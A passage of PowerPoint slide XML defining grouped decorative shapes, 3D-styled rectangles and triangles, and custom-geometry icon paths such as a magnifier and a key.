                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
